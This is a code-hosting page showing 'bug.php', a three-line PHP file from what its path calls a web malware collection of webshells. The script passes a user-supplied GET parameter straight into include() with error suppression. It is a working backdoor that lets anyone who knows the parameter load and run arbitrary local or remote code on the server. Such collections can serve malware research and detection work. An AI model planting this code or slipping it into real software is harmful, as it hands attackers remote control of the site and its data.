webshell/web-malware-collection-13-06-2012/PHP/bug.php

3 lines
32 B
PHP
Raw Normal View History

2013-06-05 12:08:30 +08:00
<?php
@include($_GET['bug']);
?>